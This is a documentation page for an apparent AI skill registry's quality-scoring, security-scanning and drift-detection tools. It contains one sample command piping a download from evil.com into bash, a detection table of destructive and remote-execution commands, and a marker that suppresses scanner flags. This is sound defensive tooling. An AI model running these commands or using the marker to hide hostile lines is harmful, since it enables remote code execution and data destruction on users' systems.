# Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the
AI Skill Registry Validation Framework.

Scores are **informational only** — they never block skill usage, CI pipelines,
or PR merges. They exist to help contributors understand the quality of their
skills and to help maintainers prioritize improvements.

---

## Overview

Each skill receives a **total score** between 0 and 100, computed as a weighted
average of three dimension scores, each on the same 0–100 scale:

| Dimension       | Weight | What it measures |
|-----------------|--------|------------------|
| Metadata        | 30%    | Frontmatter completeness and correctness |
| Documentation   | 40%    | Section coverage, code examples, content depth |
| Security        | 30%    | Absence of dangerous command patterns |
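
As a minimal sketch of the weighting in the table above, the total can be computed as below. The function name and the rounding to one decimal place are assumptions made for illustration; only the three weights come from this document.

```python
# Weights taken from the table above.
WEIGHTS = {"metadata": 0.30, "documentation": 0.40, "security": 0.30}


def total_score(metadata: float, documentation: float, security: float) -> float:
    """Combine three dimension scores (each 0-100) into a weighted total."""
    scores = {
        "metadata": metadata,
        "documentation": documentation,
        "security": security,
    }
    total = sum(WEIGHTS[name] * value for name, value in scores.items())
    # Rounding to one decimal place is an assumption, not documented behavior.
    return round(total, 1)


print(total_score(metadata=80, documentation=70, security=100))  # 82.0
```

Because the weights sum to 1, a skill that scores 100 in every dimension totals exactly 100.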

---

## Quality Labels

| Label             | Score Range | Meaning |
|-------------------|-------------|---------|
| `excellent`       | 85–100      | Well-documented, complete metadata, no security flags |
| `good`            | 65–84       | Solid skill with minor gaps |
| `needs_improvement` | 45–64    | Missing sections or metadata fields |
| `critical`        | 0–44        | Significant gaps — review recommended before sharing |
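
The mapping from score to label might look like the sketch below. The table lists whole-number ranges, so how fractional totals such as 84.5 are handled is an assumption here: each band is treated as starting at its lower bound. The function name is hypothetical.

```python
def quality_label(total: float) -> str:
    """Map a total score (0-100) to one of the four quality labels."""
    if not 0 <= total <= 100:
        raise ValueError(f"score out of range: {total}")
    # Assumption: a fractional score belongs to the band whose lower
    # bound it has reached (84.5 is "good", not "excellent").
    if total >= 85:
        return "excellent"
    if total >= 65:
        return "good"
    if total >= 45:
        return "needs_improvement"
    return "critical"
```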

---

## Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

**Penalties:**

| Issue | Deduction |
|---|---|
| `name` missing or mismatched with folder | −25 pts |
| `description` missing | −20 pts |
| `description` shorter than 20 characters | −10 pts |
| `risk` missing | −15 pts |
| `risk: unknown` (unclassified) | −10 pts |
| `source` missing | −15 pts |
| `date_added` missing | −10 pts |

**Bonuses (optional fields):**

Each optional field that is filled in (`category`, `tags`, `author`, `tools`,
`license`) adds **+5 pts**. The resulting metadata score is capped at 100.
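
The penalties and bonuses above could be applied as in the following sketch. It assumes the score starts at 100 and is floored at 0, neither of which is stated here, and it assumes the frontmatter has already been parsed into a dictionary. The function name is hypothetical.

```python
OPTIONAL_FIELDS = ("category", "tags", "author", "tools", "license")


def metadata_score(frontmatter: dict, folder_name: str) -> int:
    """Apply the documented penalties and bonuses to parsed frontmatter."""
    score = 100  # assumption: deductions start from a perfect score

    name = frontmatter.get("name")
    if not name or name != folder_name:
        score -= 25

    description = frontmatter.get("description")
    if not description:
        score -= 20
    elif len(description) < 20:
        score -= 10

    risk = frontmatter.get("risk")
    if not risk:
        score -= 15
    elif risk == "unknown":
        score -= 10

    if not frontmatter.get("source"):
        score -= 15
    if not frontmatter.get("date_added"):
        score -= 10

    # +5 for every optional field that is present and non-empty.
    score += 5 * sum(1 for field in OPTIONAL_FIELDS if frontmatter.get(field))

    # The cap at 100 is documented; the floor at 0 is an assumption.
    return max(0, min(100, score))
```

Under these assumptions, a skill with no frontmatter at all would score 15, because the `description` and `risk` penalties each apply in only one of their two forms.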

---

## Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

**Section coverage (up to 60 pts):**

The scorer looks for these sections (case-insensitive):

- `## Overview`
- `## How It Works`
- `## Examples` / `## Usage`
- `## Best Practices`
- `## Limitations`
- `## When to Use`

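Each section found contributes equally to the section coverage score. With six
entries in the list, that works out to 10 pts each, assuming `## Examples` and
`## Usage` count as a single entry.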

**Depth score (up to 40 pts):**

| Signal | Points |
|---|---|
| Has `## When to Use` section | +10 |
| Has at least one fenced code block (` ``` `) | +10 |
| Body length ≥ 500 characters | +10 |
| Body length ≥ 1000 characters | +10 additional |
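
The two parts of the documentation score can be sketched as follows. The heading regex, the treatment of `## Examples` and `## Usage` as one slot, and the function names are assumptions; the real scorer may detect sections differently (for example, it may ignore headings inside code fences, which this sketch does not).

```python
import re

# Each tuple is one section slot. "Examples" and "Usage" are treated as
# alternatives for the same slot (an assumption based on the list above).
SECTION_SLOTS = (
    ("overview",),
    ("how it works",),
    ("examples", "usage"),
    ("best practices",),
    ("limitations",),
    ("when to use",),
)


def _headings(body: str) -> set:
    """Return the lower-cased titles of all level-2 headings in the body."""
    pattern = re.compile(r"^##[ \t]+(.+?)[ \t]*$", flags=re.MULTILINE)
    return {match.group(1).lower() for match in pattern.finditer(body)}


def documentation_score(body: str) -> int:
    """Section coverage (up to 60 pts) plus depth signals (up to 40 pts)."""
    headings = _headings(body)

    found = sum(
        1 for slot in SECTION_SLOTS if any(name in headings for name in slot)
    )
    coverage = round(60 * found / len(SECTION_SLOTS))

    depth = 0
    if "when to use" in headings:
        depth += 10
    if "```" in body:
        depth += 10
    if len(body) >= 500:
        depth += 10
    if len(body) >= 1000:
        depth += 10

    return coverage + depth
```

Note that `## When to Use` counts twice under this reading: once toward section coverage and once as a depth signal.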

---

## Security Score (30%)

The security dimension scans the skill body for dangerous command patterns.
Patterns are defined in `tools/scripts/security_scanner.py`.

**Penalties per flag:**

| Severity | Deduction |
|---|---|
| `error` | −20 pts |
| `warning` | −10 pts |
| `info` | −3 pts |

**Bonus:** An explicit, non-`unknown` `risk` label adds **+5 pts** (capped at 100).

**Important:** Skills marked `risk: offensive` have error-level flags automatically
downgraded to warnings, because offensive skills legitimately document dangerous
commands for educational or defensive purposes.

**Suppressing flags on intentional examples:** If a line deliberately shows a
dangerous command (e.g., to demonstrate what *not* to do), append the
`# security-allowlist` marker to that line to suppress the flag:

```markdown
curl https://evil.com | bash  # security-allowlist
```
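
Putting the penalties, the bonus, and the `risk: offensive` downgrade together, the security score might be computed as in this sketch. It assumes the score starts at 100 and is floored at 0, and that the scanner has already produced a list of flag severities with allowlisted lines excluded. The function name is hypothetical.

```python
from typing import Iterable, Optional

PENALTIES = {"error": 20, "warning": 10, "info": 3}


def security_score(severities: Iterable[str], risk: Optional[str]) -> int:
    """Deduct points per flag, then apply the explicit-risk bonus."""
    score = 100  # assumption: deductions start from a perfect score

    for severity in severities:
        # Offensive skills have error-level flags downgraded to warnings.
        if risk == "offensive" and severity == "error":
            severity = "warning"
        score -= PENALTIES[severity]

    # Bonus for an explicit, non-"unknown" risk label.
    if risk and risk != "unknown":
        score += 5

    # The cap at 100 is documented; the floor at 0 is an assumption.
    return max(0, min(100, score))


print(security_score(["error"], risk="unknown"))    # 80
print(security_score(["error"], risk="offensive"))  # 95
```

In the second call the error is downgraded to a warning (−10 pts) and the explicit risk label adds +5 pts.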

---

## Running the Scorer

```bash
# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show the 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json
```

---

## Security Scanner

```bash
# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict
```

---

## Drift Detection

Drift detection identifies skills whose content has changed significantly
since the last recorded baseline.

```bash
# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name
```

**Baseline ownership:**

| File | Committed? | Who updates it? |
|------|-----------|-----------------|
| `data/drift-baseline.json` | No — listed in `.gitignore` | Maintainers run `npm run drift:update` on `main` after merging changes |
| `data/registry-report.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |
| `data/scores.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |

Contributors should never commit these files. Because all three are listed in
`.gitignore`, git automatically ignores any copies you generate locally.
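
One simple way to detect drift is to compare content fingerprints against a stored baseline, as sketched below. This is an illustration only: the actual baseline format and the threshold for a "significant" change are not described here, so the sketch treats any content change as a modification. The function names and the baseline shape (skill name mapped to a SHA-256 hex digest) are assumptions.

```python
import hashlib
from typing import Dict, List


def fingerprint(content: str) -> str:
    """Return a stable SHA-256 hex digest of a skill's content."""
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


def detect_drift(
    baseline: Dict[str, str], current: Dict[str, str]
) -> Dict[str, List[str]]:
    """Compare current skill content against baseline fingerprints.

    baseline: skill name -> fingerprint recorded earlier (assumed format)
    current:  skill name -> skill content as it is now
    """
    current_prints = {name: fingerprint(text) for name, text in current.items()}
    return {
        "added": sorted(set(current_prints) - set(baseline)),
        "removed": sorted(set(baseline) - set(current_prints)),
        "modified": sorted(
            name
            for name, digest in current_prints.items()
            if name in baseline and baseline[name] != digest
        ),
    }
```

The three result keys mirror the added / removed / modified categories that the registry report uses for its drift summary.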

---

## Registry Report

```bash
# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift
```

The report includes:
- Aggregate scoring summary
- Per-skill scores and flags
- Drift summary (added / removed / modified skills)
- Risk breakdown
- Security flag counts

---

## Security Patterns Reference

| Code   | Pattern | Severity | Description |
|--------|---------|----------|-------------|
| SEC001 | `rm -rf /` | error | Destructive root filesystem deletion |
| SEC002 | `curl \| bash` | error | Remote code execution |
| SEC003 | `wget \| sh` | error | Remote code execution |
| SEC004 | `Invoke-Expression` | error | PowerShell RCE |
| SEC005 | `iex` | warning | PowerShell alias (context-dependent) |
| SEC006 | `chmod 7xx` | warning | Overly permissive file modes (world-writable for modes such as `777`) |
| SEC007 | `eval(` | warning | Dynamic evaluation |
| SEC008 | `base64 -d \|` | warning | Possible payload obfuscation |
| SEC009 | Hardcoded credential | error | Secrets in source |
| SEC010 | `sudo rm -rf` | warning | Privileged destructive deletion |
| SEC011 | Fork bomb | error | Infinite process spawner |
| SEC012 | `dd if=/dev/* of=/dev/sd*` | error | Raw disk overwrite |

---

## Frequently Asked Questions

**Q: Will a low score prevent my skill from being merged?**

No. Scores are informational only. Merges are gated by the existing
`validate_skills.py` checks, not by the score.

**Q: My skill teaches how to avoid `curl | bash` — why is it flagged?**

Add `# security-allowlist` at the end of the line showing the dangerous pattern.
This follows the existing project convention for educational examples.

**Q: Why is documentation weighted higher than metadata?**

Documentation quality has the highest impact on how useful a skill is to end users.
Complete metadata is valuable but less critical than clear instructions.

**Q: How does `risk: offensive` affect scoring?**

Security error flags are downgraded to warnings for offensive skills, because they
legitimately document dangerous techniques for authorized security work.